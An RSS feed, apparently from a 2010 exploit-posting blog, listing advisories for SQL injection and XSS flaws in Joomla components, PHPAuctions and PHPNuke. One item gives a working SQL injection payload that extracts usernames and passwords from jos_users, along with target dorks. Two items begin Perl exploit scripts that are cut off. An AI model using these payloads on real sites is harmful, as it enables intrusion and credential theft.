<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>./IndonesianCoder Advisories</title>
	<atom:link href="http://www.indonesiancoder.org/feed" rel="self" type="application/rss+xml" />
	<link>http://www.indonesiancoder.org</link>
	<description></description>
	<lastBuildDate>Wed, 10 Mar 2010 10:22:24 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Joomla Component hezacontent SQL injection Vulnerability</title>
		<link>http://www.indonesiancoder.org/joomla-component-hezacontent-sql-injection-vulnerability</link>
		<comments>http://www.indonesiancoder.org/joomla-component-hezacontent-sql-injection-vulnerability#comments</comments>
		<pubDate>Wed, 10 Mar 2010 10:22:24 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Exploitasi]]></category>

		<guid isPermaLink="false">http://www.indonesiancoder.org/?p=459</guid>
		<description><![CDATA[
[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 9 march, 2010

[!]===========================================================================[!]


[ Software Information ]
[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:&#8221;CIHUY&#8221; ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0 

[!]===========================================================================[!]

[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_hezacontent&#038;view=item&#038;id=[INDONESIANCODER]
[ XpL ]
-1+union+all+select+1,2,3,4,5,6,concat_ws(0&#215;3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users&#8211;

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM &#124; KILL-9 CREW &#124; [...]]]></description>
		<wfw:commentRss>http://www.indonesiancoder.org/joomla-component-hezacontent-sql-injection-vulnerability/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHPAUCTIONS XSS Vulnerabilities</title>
		<link>http://www.indonesiancoder.org/phpauctions-xss-vulnerabilities</link>
		<comments>http://www.indonesiancoder.org/phpauctions-xss-vulnerabilities#comments</comments>
		<pubDate>Mon, 08 Mar 2010 06:10:41 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Exploitasi]]></category>

		<guid isPermaLink="false">http://www.indonesiancoder.org/?p=456</guid>
		<description><![CDATA[
#############################################################################################################
## Tittle   : PHPAUCTIONS XSS Vulnerabilities                                                [...]]]></description>
		<wfw:commentRss>http://www.indonesiancoder.org/phpauctions-xss-vulnerabilities/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Joomla Component hdflvplayer SQL Injection exploit</title>
		<link>http://www.indonesiancoder.org/joomla-component-hdflvplayer-sql-injection-exploit</link>
		<comments>http://www.indonesiancoder.org/joomla-component-hdflvplayer-sql-injection-exploit#comments</comments>
		<pubDate>Mon, 08 Mar 2010 03:05:51 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Exploitasi]]></category>

		<guid isPermaLink="false">http://www.indonesiancoder.org/?p=453</guid>
		<description><![CDATA[
######################################################################
#
# [~] Joomla Component hdflvplayer SQL Injection exploit - (id)
# [~] Author	: kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage	: http://www.indonesiancoder.com
# [~] Date	: 15 February, 2010
#
######################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
######################################################################
#
# USAGE : perl kaMz.pl
#
######################################################################



#!/usr/bin/perl -w
&#160;
print &#34;\t\t[!]=========================================================[!]\n\n&#34;;
print &#34;\t\t [...]]]></description>
		<wfw:commentRss>http://www.indonesiancoder.org/joomla-component-hdflvplayer-sql-injection-exploit/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Joomla! Joaktree Component Exploit</title>
		<link>http://www.indonesiancoder.org/joomla-joaktree-component-exploit</link>
		<comments>http://www.indonesiancoder.org/joomla-joaktree-component-exploit#comments</comments>
		<pubDate>Mon, 08 Mar 2010 03:00:04 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Exploitasi]]></category>

		<guid isPermaLink="false">http://www.indonesiancoder.org/?p=449</guid>
		<description><![CDATA[
####################################################################################
#[~] Joomla Component com_joaktree  SQL injection Exploit - (treeId)
#[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage	: http://www.indonesiancoder.com
#[~] Date	: 20 February, 2010
####################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
####################################################################################
#
# USAGE : perl kaMz.pl
#
####################################################################################



#!/usr/bin/perl -w
&#160;
print &#34;\t\t[!]=========================================================[!]\n\n&#34;;
print &#34;\t\t   [...]]]></description>
		<wfw:commentRss>http://www.indonesiancoder.org/joomla-joaktree-component-exploit/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHPNUKE CMS ( Survey&amp;poll ) SQL Injection</title>
		<link>http://www.indonesiancoder.org/phpnuke-cms-surveypoll-sql-injection</link>
		<comments>http://www.indonesiancoder.org/phpnuke-cms-surveypoll-sql-injection#comments</comments>
		<pubDate>Sat, 06 Mar 2010 09:56:33 +0000</pubDate>
		<dc:creator>Admin</dc:creator>
				<category><![CDATA[Exploitasi]]></category>

		<guid isPermaLink="false">http://www.indonesiancoder.org/?p=445</guid>
		<description><![CDATA[
########################################################################################
## Tittle : PHPNUKE CMS ( Survey&#038;poll ) SQLi Vulner                                              [...]]]></description>
		<wfw:commentRss>http://www.indonesiancoder.org/phpnuke-cms-surveypoll-sql-injection/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
